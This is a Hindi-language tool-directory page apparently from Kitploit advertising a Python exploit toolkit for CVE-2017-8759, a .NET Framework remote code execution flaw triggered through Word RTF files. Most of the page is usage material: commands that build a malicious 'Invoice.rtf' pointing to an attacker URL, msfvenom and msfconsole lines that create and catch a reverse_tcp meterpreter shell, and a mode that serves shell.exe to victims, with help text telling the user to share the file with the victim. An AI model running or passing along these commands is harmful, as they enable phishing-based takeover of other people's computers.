Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-8759 — CVE-2017-8759 माइक्रोसॉफ्ट वर्ड भेद्यता शोषण स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/adeljck/cve-2017-8759
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubadeljck/cve-2017-8759

CVE-2017-8759

CVE-2017-8759 माइक्रोसॉफ्ट वर्ड भेद्यता शोषण स्क्रिप्ट

रिपॉजिटरी देखें
7 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-8759 शोषण उपकरण

CVE-2017-8759 शोषण उपकरण एक उपयोगी पायथन स्क्रिप्ट है जो पेंटेस्टर्स और सुरक्षा शोधकर्ताओं को Microsoft .NET Framework RCE का परीक्षण करने का एक त्वरित और प्रभावी तरीका प्रदान करता है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकता है और बिना किसी जटिल कॉन्फ़िगरेशन के पीड़ित तक metasploit / meterpreter / अन्य पेलोड पहुंचा सकता है।

अस्वीकरण

यह प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (bhdresh) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूँ। लेखक या कोई भी इंटरनेट सेवा प्रदाता इन प्रोग्रामों की सामग्री या दुरुपयोग या इनके किसी भी व्युत्पन्न के लिए कोई जिम्मेदारी नहीं लेता है। इस प्रोग्राम का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम से छेड़छाड़, आदि) bhdresh की जिम्मेदारी नहीं है।

अंत में, यह एक व्यक्तिगत विकास है, कृपया इसके दर्शन का सम्मान करें और इसका उपयोग बुरे कामों के लिए न करें!

रिलीज़ नोट:

स्क्रिप्ट में निम्नलिखित क्षमताएँ जोड़ी गई हैं:

root@kitploit:~
- दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
- उत्पन्न RTF फ़ाइल के लिए शोषण मोड

संस्करण: Python संस्करण 2.7.13

परिदृश्य: स्थानीय meterpreter पेलोड वितरित करें

उदाहरण कमांड
root@kitploit:~
1) दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (वैकल्पिक, यदि MSF पेलोड का उपयोग कर रहे हैं): metasploit पेलोड उत्पन्न करें और हैंडलर प्रारंभ करें
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) स्थानीय पेलोड वितरित करने के लिए टूलकिट को शोषण मोड में प्रारंभ करें
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

कमांड लाइन तर्क:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)

Modes:

-M gen                                          Generate Malicious file only

     Generate malicious RTF/PPSX file:

      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

      -u <http://attacker.com/test.txt>   Path of remote txt file. Normally, this should be a domain or IP where this                                          tool is running.
                                          For example, http://attackerip.com/test.txt (This URL will be included in 	                                              malicious RTF file and will be requested once victim will open malicious RTF file.

				      
-M exp                                          Start exploitation mode

     Exploitation:
  
      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 Specify local path of an executable file / meterpreter shell / payload.
टूल डाउनलोड करें